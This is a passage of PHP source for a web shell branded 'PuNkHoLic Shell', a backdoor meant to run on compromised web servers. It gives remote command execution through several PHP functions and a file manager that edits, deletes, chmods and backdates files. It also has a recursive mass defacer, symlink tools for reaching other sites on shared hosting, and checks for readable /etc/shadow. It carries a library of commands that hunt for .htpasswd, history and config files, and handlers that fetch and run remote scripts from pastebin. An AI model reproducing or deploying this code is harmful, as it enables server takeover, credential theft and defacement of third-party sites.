"List dir" => "ls -la", 88 | "list file attributes on a Linux second extended file system" => "lsattr -va", 89 | "show opened ports" => "netstat -an | grep -i listen", 90 | "Find" => "", 91 | "find all suid files" => "find / -type f -perm -04000 -ls", 92 | "find suid files in current dir" => "find . -type f -perm -04000 -ls", 93 | "find all sgid files" => "find / -type f -perm -02000 -ls", 94 | "find sgid files in current dir" => "find . -type f -perm -02000 -ls", 95 | "find config.inc.php files" => "find / -type f -name config.inc.php", 96 | "find config* files" => "find / -type f -name \"config*\"", 97 | "find config* files in current dir" => "find . -type f -name \"config*\"", 98 | "find all writable folders and files" => "find / -perm -2 -ls", 99 | "find all writable folders and files in current dir" => "find . -perm -2 -ls", 100 | "find all service.pwd files" => "find / -type f -name service.pwd", 101 | "find service.pwd files in current dir" => "find . -type f -name service.pwd", 102 | "find all .htpasswd files" => "find / -type f -name .htpasswd", 103 | "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", 104 | "find all .bash_history files" => "find / -type f -name .bash_history", 105 | "find .bash_history files in current dir" => "find . -type f -name .bash_history", 106 | "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", 107 | "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", 108 | "Locate" => "", 109 | "locate httpd.conf files" => "locate httpd.conf", 110 | "locate vhosts.conf files" => "locate vhosts.conf", 111 | "locate proftpd.conf files" => "locate proftpd.conf", 112 | "locate psybnc.conf files" => "locate psybnc.conf", 113 | "locate my.conf files" => "locate my.conf", 114 | "locate admin.php files" =>"locate admin.php", 115 | "locate cfg.php files" => "locate cfg.php", 116 | "locate conf.php files" => "locate conf.php", 117 | "locate config.dat files" => "locate config.dat", 118 | "locate config.php files" => "locate config.php", 119 | "locate config.inc files" => "locate config.inc", 120 | "locate config.inc.php" => "locate config.inc.php", 121 | "locate config.default.php files" => "locate config.default.php", 122 | "locate config* files " => "locate config", 123 | "locate .conf files"=>"locate '.conf'", 124 | "locate .pwd files" => "locate '.pwd'", 125 | "locate .sql files" => "locate '.sql'", 126 | "locate .htpasswd files" => "locate '.htpasswd'", 127 | "locate .bash_history files" => "locate '.bash_history'", 128 | "locate .mysql_history files" => "locate '.mysql_history'", 129 | "locate .fetchmailrc files" => "locate '.fetchmailrc'", 130 | "locate backup files" => "locate backup", 131 | "locate dump files" => "locate dump", 132 | "locate priv files" => "locate priv" 133 | ); 134 | } 135 | if(isset($_POST['p1']) && $_POST['p1']=='deface') { 136 | $def = file_get_contents($deface_url); 137 | file_put_contents($_POST['c'].$_POST['p2'],$def); 138 | } 139 | function ex($in) { 140 | $out = ''; 141 | if ( function_exists(' exec ')) { 142 | @exec($in,$out); 143 | $out = @join("\n",$out); 144 | }elseif(function_exists('passthru')) { 145 | ob_start(); 146 | @passthru($in); 147 | $out = ob_get_clean(); 148 | }elseif(function_exists('system')) { 149 | ob_start(); 150 | @system($in); 151 | $out = ob_get_clean(); 152 | }elseif(function_exists('shell_exec')) { 153 | $out = shell_exec($in); 154 | }elseif(is_resource($f = @popen($in,"r"))) { 155 | $out = ""; 156 | while(!@feof($f)) 157 | $out .= fread($f,1024); 158 | pclose($f); 159 | } 160 | return $out; 161 | } 162 | function which($p) { 163 | $path = ex('which '.$p); 164 | if(!empty($path)) 165 | return $path; 166 | return false; 167 | } 168 | function printHeader() { 169 | if(empty($_POST['charset'])) 170 | $_POST['charset'] = "UTF-8"; 171 | global $color; 172 | global $Theme; 173 | global $TabsColor; 174 | echo ""; 175 | echo ' 176 | PuNkHoLic Shell 177 | 227 | 228 | Chrome Pointer 229 | 278 |
279 |
280 | 281 | 282 | 283 | 284 | 285 | 286 |
'; 287 | $freeSpace = @diskfreespace($GLOBALS['cwd']); 288 | $totalSpace = @disk_total_space($GLOBALS['cwd']); 289 | $totalSpace = $totalSpace?$totalSpace:1; 290 | $disable_functions = @ini_get('disable_functions'); 291 | $release = @php_uname('r'); 292 | $kernel = @php_uname('s'); 293 | if(!function_exists('posix_getegid')) { 294 | $user = @get_current_user(); 295 | $uid = @getmyuid(); 296 | $gid = @getmygid(); 297 | $group = "?"; 298 | } else { 299 | $uid = @posix_getpwuid(@posix_geteuid()); 300 | $gid = @posix_getgrgid(@posix_getegid()); 301 | $user = $uid['name']; 302 | $uid = $uid['uid']; 303 | $group = $gid['name']; 304 | $gid = $gid['gid']; 305 | } 306 | $cwd_links = ''; 307 | $path = explode("/", $GLOBALS['cwd']); 308 | $n=count($path); 309 | for($i=0;$i<$n-1;$i++) { 310 | $cwd_links .= "".$path[$i]."/"; 314 | } 315 | $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); 316 | $opt_charsets = ''; 317 | foreach($charsets as $item) 318 | $opt_charsets .= ''; 319 | $m = array('Import Scripts'=>'ImportScripts','Jumping'=>'Jumping','Symlink'=>'Symlink','Domains' => 'Domain','Shared Hostings'=>'Shared','Sym Sites'=>'Sym','Subdomain'=>'Subdomain','Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Safe Mode'=>'Bypass','String tools'=>'StringTools','Defacer' => 'Deface','Recursive Defacer'=>'Defacer'); 320 | if(!empty($GLOBALS['auth_pass'])) 321 | $m['Logout'] = 'Logout'; 322 | $menu = ''; 323 | foreach($m as $k => $v) 324 | $menu .= ''.$k.''; 325 | $drives = ""; 326 | if ($GLOBALS['os'] == 'win') { 327 | foreach( range('a','z') as $drive ){ 328 | if (is_dir($drive.':\\')) 329 | $drives .= '[ '.$drive.' ] '; 330 | } 331 | $drives .= '
: '; 332 | } 333 | if($GLOBALS['os'] == 'nix') { 334 | $dominios = @file_get_contents("/etc/named.conf"); 335 | if(!$dominios) { 336 | $DomainS = "/var/named"; 337 | $Domainonserver = scandir($DomainS); 338 | $d0c = count($Domainonserver); 339 | } else { 340 | @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out); 341 | $out = sizeof(array_unique($out[1])); 342 | $d0c = $out."Domains"; 343 | } 344 | } else { 345 | $d0c = "Nothing here bro:("; 346 | } 347 | if($GLOBALS['os'] == 'nix' ) 348 | { 349 | $usefl = ''; $dwnldr = ''; 350 | if(!@ini_get('safe_mode')) { 351 | $temp = array(); 352 | $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); 353 | foreach($userful as $item) { if(which($item)) $temp[]= $item; } 354 | $usefl = implode(', ',$temp); 355 | $temp = array(); 356 | $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); 357 | foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; } 358 | $dwnldr = implode(', ',$temp); 359 | } else { 360 | $usefl = ' ------- '; $dwnldr = ' ------- '; 361 | } 362 | } else { 363 | $usefl = ' ------- '; $dwnldr = ' ------- '; 364 | } 365 | echo ''. 370 | '
'.$menu.'
'; 371 | } 372 | function printFooter() { 373 | $is_writable = is_writable($GLOBALS['cwd'])?"[ Writeable ]":"[ Not writable ]"; 374 | echo '
375 | 376 | 377 | 378 | 379 | 380 | 381 | 382 | 383 | 384 | 385 | 386 | 392 | 393 |
Change dir:
Read file:
Make dir:
'.$is_writable.'
Make file:
'.$is_writable.'
Execute:
387 | 388 | 389 | 390 | 391 | Upload file:
'.$is_writable.'
394 |
PuNkHoLic Shell coded by PuNkHoLic
395 |
396 | '; 397 | } 398 | if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } } 399 | if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } } 400 | function viewSize($s) { 401 | if($s >= 1073741824) 402 | return sprintf('%1.2f', $s / 1073741824 ). ' GB'; 403 | elseif($s >= 1048576) 404 | return sprintf('%1.2f', $s / 1048576 ) . ' MB'; 405 | elseif($s >= 1024) 406 | return sprintf('%1.2f', $s / 1024 ) . ' KB'; 407 | else 408 | return $s . ' B'; 409 | } 410 | function perms($p) { 411 | if (($p & 0xC000) == 0xC000)$i = 's'; 412 | elseif (($p & 0xA000) == 0xA000)$i = 'l'; 413 | elseif (($p & 0x8000) == 0x8000)$i = '-'; 414 | elseif (($p & 0x6000) == 0x6000)$i = 'b'; 415 | elseif (($p & 0x4000) == 0x4000)$i = 'd'; 416 | elseif (($p & 0x2000) == 0x2000)$i = 'c'; 417 | elseif (($p & 0x1000) == 0x1000)$i = 'p'; 418 | else $i = 'u'; 419 | $i .= (($p & 0x0100) ? 'r' : '-'); 420 | $i .= (($p & 0x0080) ? 'w' : '-'); 421 | $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); 422 | $i .= (($p & 0x0020) ? 'r' : '-'); 423 | $i .= (($p & 0x0010) ? 'w' : '-'); 424 | $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); 425 | $i .= (($p & 0x0004) ? 'r' : '-'); 426 | $i .= (($p & 0x0002) ? 'w' : '-'); 427 | $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); 428 | return $i; 429 | } 430 | function viewPermsColor($f) { 431 | if (!@is_readable($f)) 432 | return ''.perms(@fileperms($f)).''; 433 | elseif (!@is_writable($f)) 434 | return ''.perms(@fileperms($f)).''; 435 | else 436 | return ''.perms(@fileperms($f)).''; 437 | } 438 | if(!function_exists("scandir")) { 439 | function scandir($dir) { 440 | $dh= opendir($dir); 441 | while (false !== ($filename = readdir($dh))) { 442 | $files[] = $filename; 443 | } 444 | return $files; 445 | } 446 | } 447 | function actionSecInfo() { 448 | printHeader(); 449 | echo '

Server security information

'; 450 | function showSecParam($n, $v) { 451 | $v = trim($v); 452 | if($v) { 453 | echo ''.$n.': '; 454 | if(strpos($v, "\n") === false) 455 | echo $v.'
'; 456 | else 457 | echo '
'.$v.'
'; 458 | } 459 | } 460 | showSecParam('Server software', @getenv('SERVER_SOFTWARE')); 461 | showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); 462 | showSecParam('Open base dir', @ini_get('open_basedir')); 463 | showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); 464 | showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); 465 | showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); 466 | $temp=array(); 467 | if(function_exists('mysql_get_client_info')) 468 | $temp[] = "MySql (".mysql_get_client_info().")"; 469 | if(function_exists('mssql_connect')) 470 | $temp[] = "MSSQL"; 471 | if(function_exists('pg_connect')) 472 | $temp[] = "PostgreSQL"; 473 | if(function_exists('oci_connect')) 474 | $temp[] = "Oracle"; 475 | showSecParam('Supported databases', implode(', ', $temp)); 476 | echo '
'; 477 | if( $GLOBALS['os'] == 'nix' ) { 478 | $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); 479 | $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); 480 | $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); 481 | showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); 482 | showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); 483 | showSecParam('OS version', @file_get_contents('/proc/version')); 484 | showSecParam('Distr name', @file_get_contents('/etc/issue.net')); 485 | if(!$GLOBALS['safe_mode']) { 486 | echo '
'; 487 | $temp=array(); 488 | foreach ($userful as $item) 489 | if(which($item)){$temp[]=$item;} 490 | showSecParam('Userful', implode(', ',$temp)); 491 | $temp=array(); 492 | foreach ($danger as $item) 493 | if(which($item)){$temp[]=$item;} 494 | showSecParam('Danger', implode(', ',$temp)); 495 | $temp=array(); 496 | foreach ($downloaders as $item) 497 | if(which($item)){$temp[]=$item;} 498 | showSecParam('Downloaders', implode(', ',$temp)); 499 | echo '
'; 500 | showSecParam('Hosts', @file_get_contents('/etc/hosts')); 501 | showSecParam('HDD space', ex('df -h')); 502 | showSecParam('Mount options', @file_get_contents('/etc/fstab')); 503 | } 504 | } else { 505 | showSecParam('OS Version',ex('ver')); 506 | showSecParam('Account Settings',ex('net accounts')); 507 | showSecParam('User Accounts',ex('net user')); 508 | } 509 | echo '
'; 510 | printFooter(); 511 | } 512 | function actionFilesMan() { 513 | printHeader(); 514 | echo '

File manager

'; 515 | if(isset($_POST['p1']) && $_POST['p1']!='deface') { 516 | switch($_POST['p1']) { 517 | case 'uploadFile': 518 | if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) 519 | echo "Can't upload file!"; 520 | break; 521 | break; 522 | case 'mkdir': 523 | if(!@mkdir($_POST['p2'])) 524 | echo "Can't create new dir"; 525 | break; 526 | case 'delete': 527 | function deleteDir($path) { 528 | $path = (substr($path,-1)=='/') ? $path:$path.'/'; 529 | $dh= opendir($path); 530 | while ( ($item = readdir($dh) ) !== false) { 531 | $item = $path.$item; 532 | if ( (basename($item) == "..") || (basename($item) == ".") ) 533 | continue; 534 | $type = filetype($item); 535 | if ($type == "dir") 536 | deleteDir($item); 537 | else 538 | @unlink($item); 539 | } 540 | closedir($dh); 541 | rmdir($path); 542 | } 543 | if(is_array(@$_POST['f'])) 544 | foreach($_POST['f'] as $f) { 545 | $f = urldecode($f); 546 | if(is_dir($f)) 547 | deleteDir($f); 548 | else 549 | @unlink($f); 550 | } 551 | break; 552 | case 'paste': 553 | if($_SESSION['act'] == 'copy') { 554 | function copy_paste($c,$s,$d){ 555 | if(is_dir($c.$s)){ 556 | mkdir($d.$s); 557 | $h = opendir($c.$s); 558 | while (($f = readdir($h)) !== false) 559 | if (($f != ".") and ($f != "..")) { 560 | copy_paste($c.$s.'/',$f, $d.$s.'/'); 561 | } 562 | } elseif(is_file($c.$s)) { 563 | @copy($c.$s, $d.$s); 564 | } 565 | } 566 | foreach($_SESSION['f'] as $f) 567 | copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']); 568 | } elseif($_SESSION['act'] == 'move') { 569 | function move_paste($c,$s,$d){ 570 | if(is_dir($c.$s)){ 571 | mkdir($d.$s); 572 | $h = opendir($c.$s); 573 | while (($f = readdir($h)) !== false) 574 | if (($f != ".") and ($f != "..")) { 575 | copy_paste($c.$s.'/',$f, $d.$s.'/'); 576 | } 577 | } elseif(is_file($c.$s)) { 578 | @copy($c.$s, $d.$s); 579 | } 580 | } 581 | foreach($_SESSION['f'] as $f) 582 | @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f); 583 | } 584 | unset($_SESSION['f']); 585 | break; 586 | default: 587 | if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { 588 | $_SESSION['act'] = @$_POST['p1']; 589 | $_SESSION['f'] = @$_POST['f']; 590 | foreach($_SESSION['f'] as $k => $f) 591 | $_SESSION['f'][$k] = urldecode($f); 592 | $_SESSION['cwd'] = @$_POST['c']; 593 | } 594 | break; 595 | } 596 | echo ''; 597 | } 598 | $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); 599 | if($dirContent === false) {echo 'Can\'t open this folder!'; return;} 600 | global $sort; 601 | $sort = array('name', 1); 602 | if(!empty($_POST['p1'])) { 603 | if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) 604 | $sort = array($match[1], (int)$match[2]); 605 | } 606 | echo ' 613 | 614 | '; 615 | echo ""; 616 | $dirs = $files = $links = array(); 617 | $n = count($dirContent); 618 | for($i=0;$i<$n;$i++) { 619 | $ow = @posix_getpwuid(@fileowner($dirContent[$i])); 620 | $gr = @posix_getgrgid(@filegroup($dirContent[$i])); 621 | $tmp = array('name' => $dirContent[$i], 622 | 'path' => $GLOBALS['cwd'].$dirContent[$i], 623 | 'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 624 | 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]), 625 | 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 626 | 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 627 | 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) 628 | ); 629 | if(@is_file($GLOBALS['cwd'].$dirContent[$i])) 630 | $files[] = array_merge($tmp, array('type' => 'file')); 631 | elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) 632 | $links[] = array_merge($tmp, array('type' => 'link')); 633 | elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != ".")) 634 | $dirs[] = array_merge($tmp, array('type' => 'dir')); 635 | } 636 | $GLOBALS['sort'] = $sort; 637 | function cmp($a, $b) { 638 | if($GLOBALS['sort'][0] != 'size') 639 | return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1); 640 | else 641 | return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); 642 | } 643 | usort($files, "cmp"); 644 | usort($dirs, "cmp"); 645 | usort($links, "cmp"); 646 | $files = array_merge($dirs, $links, $files); 647 | $l = 0; 648 | foreach($files as $f) { 649 | echo ''; 651 | $l = $l?0:1; 652 | } 653 | echo ' 660 |
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');">[ '.htmlspecialchars($f['name']).' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] 650 | .'R T'.(($f['type']=='file')?' E D':'').'
654 | 655 | 656 | 657 |   
'; 661 | printFooter(); 662 | } 663 | function actionStringTools() { 664 | if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} 665 | if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$iString conversions

'; 679 | $stringTools = array( 680 | 'Base64 encode' => 'base64_encode', 681 | 'Base64 decode' => 'base64_decode', 682 | 'Url encode' => 'urlencode', 683 | 'Url decode' => 'urldecode', 684 | 'Full urlencode' => 'full_urlencode', 685 | 'md5 hash' => 'md5', 686 | 'sha1 hash' => 'sha1', 687 | 'crypt' => 'crypt', 688 | 'CRC32' => 'crc32', 689 | 'ASCII to HEX' => 'ascii2hex', 690 | 'HEX to ASCII' => 'hex2ascii', 691 | 'HEX to DEC' => 'hexdec', 692 | 'HEX to BIN' => 'hex2bin', 693 | 'DEC to HEX' => 'dechex', 694 | 'DEC to BIN' => 'decbin', 695 | 'BIN to HEX' => 'bin2hex', 696 | 'BIN to DEC' => 'bindec', 697 | 'String to lower case' => 'strtolower', 698 | 'String to upper case' => 'strtoupper', 699 | 'Htmlspecialchars' => 'htmlspecialchars', 700 | 'String length' => 'strlen', 701 | ); 702 | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 703 | $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 704 | echo "
send using AJAX
";
 708 | if(!empty($_POST['p1'])) {
 709 | if(function_exists($_POST['p1']))
 710 | echo htmlspecialchars($_POST['p1']($_POST['p2']));
 711 | }
 712 | echo"
"; 713 | printFooter(); 714 | } 715 | function actionFilesTools() { 716 | if( isset($_POST['p1']) ) 717 | $_POST['p1'] = urldecode($_POST['p1']); 718 | if(@$_POST['p2']=='download') { 719 | if(is_file($_POST['p1']) && is_readable($_POST['p1'])) { 720 | ob_start("ob_gzhandler", 4096); 721 | header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); 722 | if (function_exists("mime_content_type")) { 723 | $type = @mime_content_type($_POST['p1']); 724 | header("Content-Type: ".$type); 725 | } 726 | $fp = @fopen($_POST['p1'], "r"); 727 | if($fp) { 728 | while(!@feof($fp)) 729 | echo @fread($fp, 1024); 730 | fclose($fp); 731 | } 732 | } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) { 733 | } 734 | exit; 735 | } 736 | if( @$_POST['p2'] == 'mkfile' ) { 737 | if(!file_exists($_POST['p1'])) { 738 | $fp = @fopen($_POST['p1'], 'w'); 739 | if($fp) { 740 | $_POST['p2'] = "edit"; 741 | fclose($fp); 742 | } 743 | } 744 | } 745 | printHeader(); 746 | echo '

File tools

'; 747 | if( !file_exists(@$_POST['p1']) ) { 748 | echo 'File not exists'; 749 | printFooter(); 750 | return; 751 | } 752 | $uid = @posix_getpwuid(@fileowner($_POST['p1'])); 753 | $gid = @posix_getgrgid(@fileowner($_POST['p1'])); 754 | echo 'Name: '.htmlspecialchars($_POST['p1']).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; 755 | echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; 756 | if( empty($_POST['p2']) ) 757 | $_POST['p2'] = 'view'; 758 | if( is_file($_POST['p1']) ) 759 | $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); 760 | else 761 | $m = array('Chmod', 'Rename', 'Touch'); 762 | foreach($m as $v) 763 | echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; 764 | echo '

'; 765 | switch($_POST['p2']) { 766 | case 'view': 767 | echo '
';
 768 | $fp = @fopen($_POST['p1'], 'r');
 769 | if($fp) {
 770 | while( !@feof($fp) )
 771 | echo htmlspecialchars(@fread($fp, 1024));
 772 | @fclose($fp);
 773 | }
 774 | echo '
'; 775 | break; 776 | case 'highlight': 777 | if( is_readable($_POST['p1']) ) { 778 | echo '
'; 779 | $code = highlight_file($_POST['p1'],true); 780 | echo str_replace(array(''), array(''),$code).'
'; 781 | } 782 | break; 783 | case 'chmod': 784 | if( !empty($_POST['p3']) ) { 785 | $perms = 0; 786 | for($i=strlen($_POST['p3'])-1;$i>=0;--$i) 787 | $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); 788 | if(!@chmod($_POST['p1'], $perms)) 789 | echo 'Can\'t set permissions!
'; 790 | else 791 | die(''); 792 | } 793 | echo '
'; 794 | break; 795 | case 'edit': 796 | if( !is_writable($_POST['p1'])) { 797 | echo 'File isn\'t writeable'; 798 | break; 799 | } 800 | if( !empty($_POST['p3']) ) { 801 | @file_put_contents($_POST['p1'],$_POST['p3']); 802 | echo 'Saved!
'; 803 | } 804 | echo '
'; 812 | break; 813 | case 'hexdump': 814 | $c = @file_get_contents($_POST['p1']); 815 | $n = 0; 816 | $h = array('00000000
','',''); 817 | $len = strlen($c); 818 | for ($i=0; $i<$len; ++$i) { 819 | $h[1] .= sprintf('%02X',ord($c[$i])).' '; 820 | switch ( ord($c[$i]) ) { 821 | case 0:$h[2] .= ' '; break; 822 | case 9:$h[2] .= ' '; break; 823 | case 10: $h[2] .= ' '; break; 824 | case 13: $h[2] .= ' '; break; 825 | default: $h[2] .= $c[$i]; break; 826 | } 827 | $n++; 828 | if ($n == 32) { 829 | $n = 0; 830 | if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} 831 | $h[1] .= '
'; 832 | $h[2] .= "\n"; 833 | } 834 | } 835 | echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; 836 | break; 837 | case 'rename': 838 | if( !empty($_POST['p3']) ) { 839 | if(!@rename($_POST['p1'], $_POST['p3'])) 840 | echo 'Can\'t rename!
'; 841 | else 842 | die(''); 843 | } 844 | echo '
'; 845 | break; 846 | case 'touch': 847 | if( !empty($_POST['p3']) ) { 848 | $time = strtotime($_POST['p3']); 849 | if($time) { 850 | if(@touch($_POST['p1'],$time,$time)) 851 | die(''); 852 | else { 853 | echo 'Fail!'; 854 | } 855 | } else echo 'Bad time format!'; 856 | } 857 | echo '
'; 858 | break; 859 | case 'mkfile': 860 | break; 861 | } 862 | echo '
'; 863 | printFooter(); 864 | } 865 | function actionDefacer() { 866 | printHeader(); 867 | echo "

Recursive Mass Defacer

"; 868 | ?> 869 |
870 |

Folder: 871 |
file name : 872 |
Text Content : 873 |

874 | 880 | [+] Recursive Mass defacer
881 | -----------------------------------------------

"; 882 | $dir = opendir($mainpath); 883 | while ($row = readdir($dir)) { 884 | $start = @fopen("$row/$file", "w+"); 885 | $code = $txtContents; 886 | $finish = @fwrite($start, $code); 887 | if ($finish) { 888 | echo "http://$row/$file
"; 889 | } 890 | if (strncasecmp(PHP_OS, 'WIN', 3) == 0) { 891 | exec("for /r %cd% %i in (.) do @copy $file %i 1>NUL"); 892 | } else { 893 | system("find $PWM -type d -exec cp $file {} \;"); 894 | } 895 | } 896 | echo "-----------------------------------------------

[+] Script by PuNkHoLic [+]"; 897 | } 898 | echo '
'; 899 | printFooter(); 900 | } 901 | function actionConsole() { 902 | if(isset($_POST['ajax'])) { 903 | $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 904 | ob_start(); 905 | echo "document.cf.cmd.value='';\n"; 906 | $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0")); 907 | if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)){ 908 | if(@chdir($match[1])) { 909 | $GLOBALS['cwd'] = @getcwd(); 910 | echo "document.mf.c.value='".$GLOBALS['cwd']."';"; 911 | } 912 | } 913 | echo "document.cf.output.value+='".$temp."';"; 914 | echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; 915 | $temp = ob_get_clean(); 916 | echo strlen($temp), "\n", $temp; 917 | exit; 918 | } 919 | printHeader(); 920 | echo ''; 947 | echo '

Console

send using AJAX
'; 962 | echo '
'; 963 | printFooter(); 964 | } 965 | function actionLogout() { 966 | unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); 967 | echo 'Get out Now

968 | Chrome Pointer 969 | You are out now :D
www.facebook.com/PuNkHoLic
'; 970 | } 971 | ///my editing start here for tools 972 | function download_remote_file($file_url, $save_to) 973 | { 974 | $content = file_get_contents($file_url); 975 | file_put_contents($save_to, $content); 976 | } 977 | if (isset($_POST['cp'])) { 978 | download_remote_file('http://pastebin.com/raw/2Ntdj7ju', realpath("./") . '/cp.php'); 979 | header("location:cp.php"); 980 | } 981 | if (isset($_POST['SymlinkbySmevk'])) { 982 | download_remote_file('http://pastebin.com/raw.php?i=PhSk7Kvq', realpath("./") . '/SymlinkbySmevk.php'); 983 | header("location:SymlinkbySmevk.php"); 984 | } 985 | if (isset($_POST['SymlinkbyCheetah'])) { 986 | download_remote_file('http://pastebin.com/raw.php?i=EXejgAMv', realpath("./") . '/SymlinkbyCheetah.php'); 987 | header("location:SymlinkbyCheetah.php"); 988 | } 989 | if (isset($_POST['SymlinkbyTorjan'])) { 990 | download_remote_file('http://pastebin.com/raw.php?i=YUg4pXe2', realpath("./") . '/sym.py'); 991 | $url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/trjnx/'; 992 | header('location: '.$url); 993 | system('python sym.py'); 994 | } 995 | if (isset($_POST['jump'])) { 996 | download_remote_file('http://pastebin.com/raw/MxtcT6nX', realpath("./") . '/jump.php'); 997 | header("location:jump.php"); 998 | } 999 | if (isset($_POST['adminer'])) { 1000 | system('wget https://www.adminer.org/static/download/4.2.5/adminer-4.2.5-mysql-en.php adminer.php'); 1001 | header("location:adminer-4.2.5-mysql-en.php"); 1002 | } 1003 | if (isset($_POST['cg'])) { 1004 | download_remote_file('http://pastebin.com/raw/WSgkDHSN', realpath("./") . '/cg.php'); 1005 | header("location:cg.php"); 1006 | } 1007 | function actionImportScripts() { 1008 | printHeader(); 1009 | echo ''; 1012 | echo ''; 1013 | echo ''; 1014 | echo ''; 1015 | echo ''; 1016 | echo ''; 1017 | echo ''; 1018 | printFooter(); 1019 | } 1020 | function actionShared() { 1021 | printHeader(); 1022 | $file = @implode(@file("/etc/named.conf")); 1023 | if (!$file) { 1024 | die("# can't ReaD -> [ /etc/named.conf ]"); 1025 | } 1026 | preg_match_all("#named/(.*?).db#", $file, $r); 1027 | $domains = array_unique($r[1]); 1028 | { 1029 | foreach ($domains as $domain) { 1030 | $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain)); 1031 | $array= "http://$domain " . $user['name'] . "
"; 1032 | $lol= '' . get_current_user(); 1033 | if (strpos($array, "$lol") !== false) { 1034 | $shared = str_replace(array(" $lol"), "", $array); 1035 | echo "
$shared"; 1036 | } 1037 | } 1038 | } 1039 | printFooter(); 1040 | } 1041 | function actionSymlink() { 1042 | printHeader(); 1043 | echo '

Symlink

'; 1044 | $furl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; 1045 | $expld = explode('/',$furl ); 1046 | $burl =str_replace(end($expld),'',$furl); 1047 | echo '
1048 |

[ Domains ] - 1049 | [ Whole Server Symlink ] - 1050 | [ Config files symlink ]

'; 1051 | if(isset($_POST['p1']) && $_POST['p1']=='website') 1052 | { 1053 | echo "
"; 1054 | $d0mains = @file("/etc/named.conf"); 1055 | if(!$d0mains){ 1056 | echo "
Cant access this file on server -> [ /etc/named.conf ]
"; 1057 | } else { 1058 | echo "
Just click and get the Script :).
1010 |
1011 |
